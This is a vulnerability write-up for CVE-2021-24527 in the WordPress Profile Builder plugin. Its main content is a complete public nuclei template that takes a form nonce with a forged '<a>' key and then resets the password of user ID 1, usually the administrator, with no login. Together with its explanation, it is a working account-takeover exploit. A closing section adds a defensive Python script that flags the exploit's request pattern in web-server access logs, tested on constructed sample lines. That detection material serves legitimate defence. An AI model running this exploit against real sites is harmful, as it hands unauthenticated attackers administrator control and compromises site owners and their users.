The Profile Builder plugin before 3.4.9 for WordPress allows unauthenticated attackers to gain administrative access by exploiting an improper authentication vulnerability in the password reset functionality. An attacker can reset the password of any user, including administrators, without proper authorization, leading to a complete site compromise. The public PoC below is a nuclei template with two requests: the first fetches the password-recovery form with a bogus key (%3Ca%3E, i.e. "<a>") and extracts the form nonce; the second submits the reset form with that nonce, a random 12-character password and the userData field set to 1, so it targets user ID 1, which is normally the account created at install. A 200 response containing "Your password has been successfully changed" is treated as confirmation and the new password is reported. Note that running it against a live site actually changes that account's password, so it is a destructive check; confirm exposure by version first wherever possible.
PoC code [public]
id: CVE-2021-24527

info:
  name: Profile Builder < 3.4.9 - Improper Authentication
  author: Sourabh-Sahu
  severity: critical
  description: |
    The Profile Builder plugin before 3.4.9 for WordPress allows unauthenticated attackers to gain administrative access by exploiting an improper authentication vulnerability in the password reset functionality. An attacker can reset the password of any user, including administrators, without proper authorization, leading to a complete site compromise.
  remediation: Fixed in 3.4.9
  reference:
    - https://wpscan.com/vulnerability/c142e738-bc4b-4058-a03e-1be6fca47207/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24527
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24527
    epss-score: 0.78165
    epss-percentile: 0.98985
    cwe-id: CWE-287
    cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: cozmoslabs
    product: profile-builder
    publicwww-query: "/wp-content/plugins/profile-builder/"
  tags: cve,cve2021,wp,wp-plugin,wordpress,profile-builder

variables:
  pass: "{{to_lower(rand_text_alpha(12))}}"   # random new password set on the target account
  path: "{{path}}"

http:
  # Request 1: load the password-recovery form with a bogus key ("<a>") and pull the form nonce.
  - raw:
      - |
        GET {{path}}/?key=%3Ca%3E HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'name="password_recovery_nonce_field2"\s+value="([^"]+)"'
        internal: true

  # Request 2: submit the reset form for user ID 1 (userData) with the nonce and the random password.
  # Every multipart part needs the blank line between its Content-Disposition header and its value.
  - raw:
      - |
        POST {{path}}/?key=%3Ca%3E HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8nxJ9mBo6lwGYE0K

        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="passw1"

        {{pass}}
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="userData"

        1
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="passw2"

        {{pass}}
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="recover_password2"

        Reset Password
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="action2"

        recover_password2
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="key"

        <a>
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="password_recovery_nonce_field2"

        {{nonce}}
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K
        Content-Disposition: form-data; name="_wp_http_referer"

        /?key=%3Ca%
        ------WebKitFormBoundary8nxJ9mBo6lwGYE0K--

    skip-variables-check: true

    # Success = HTTP 200 plus the plugin's confirmation string; the new password is then reported.
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Your password has been successfully changed")'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - pass
# digest: 4a0a0047304502207e0aa8d926ac788da852d977e411dbde99e848443eb4793a1a4801164cfb3d9b0221008d065b65783676dd0ef348f3ad283d49f26551334ceacce40a4dd55e226ad2e1:922c64590222798bb761d5b6d8e72950
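On the defensive side, the template leaves a recognisable trace even in plain web-server access logs. The script below is an added example (editor's code, not part of the page or the nuclei template) that scans Apache/nginx "combined" format lines for the pattern the template exposes in the URL: a password-recovery request whose key parameter decodes to "<a>" rather than an opaque reset token, first on the GET that fetches the form and nonce, then on the POST that performs the reset. POST bodies (recover_password2, userData, the nonce) are not logged, so they cannot be used here. The log lines are constructed for the example, not captured traffic, and the rule that a genuine reset key never contains angle brackets is an assumption.

```python
"""Spot the CVE-2021-24527 PoC request pattern in web-server access logs.

Added example (editor's code, not from the page or the nuclei template).
Assumptions: combined log format; a genuine reset link carries an opaque
token, so a key containing angle brackets is treated as forged.
"""
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one PoC run from 203.0.113.7, one legitimate reset from 198.51.100.4.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2021:12:00:01 +0000] "GET /?key=%3Ca%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2021:12:00:02 +0000] "POST /?key=%3Ca%3E HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jun/2021:12:05:00 +0000] "GET /?key=7f3kQ9x2LmZa HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jun/2021:12:05:40 +0000] "POST /?key=7f3kQ9x2LmZa HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Jun/2021:12:10:00 +0000] "GET /blog/ HTTP/1.1" 200 8000 "-" "curl/7.68.0"
"""


def parse_line(line):
    """Combined-format line -> dict with ip, ts, method, target, status and the decoded key (or None)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    query = urlsplit(rec["target"]).query
    rec["key"] = parse_qs(query).get("key", [None])[0]  # parse_qs percent-decodes: %3Ca%3E -> "<a>"
    return rec


def key_is_markup(key):
    """Assumption: an opaque reset token never contains angle brackets, so these are forged keys."""
    return key is not None and ("<" in key or ">" in key)


def detect(log_text):
    """One finding per request with a forged key, tagged with the PoC stage its method matches."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not key_is_markup(rec["key"]):
            continue
        stage = "nonce-fetch" if rec["method"] == "GET" else "password-reset-attempt"
        findings.append({"ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                         "target": rec["target"], "status": rec["status"], "stage": stage})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['ts']:%Y-%m-%dT%H:%M:%S%z} {f['ip']} {f['method']} {f['target']} -> {f['stage']}")
```

A 200 on the POST is what the template requires but not what proves success (it also looks for the confirmation string in the body, which logs never show), so treat a "password-reset-attempt" hit as a trigger to verify on the application side whether the targeted account's password actually changed, and to rotate it and review sessions if it did.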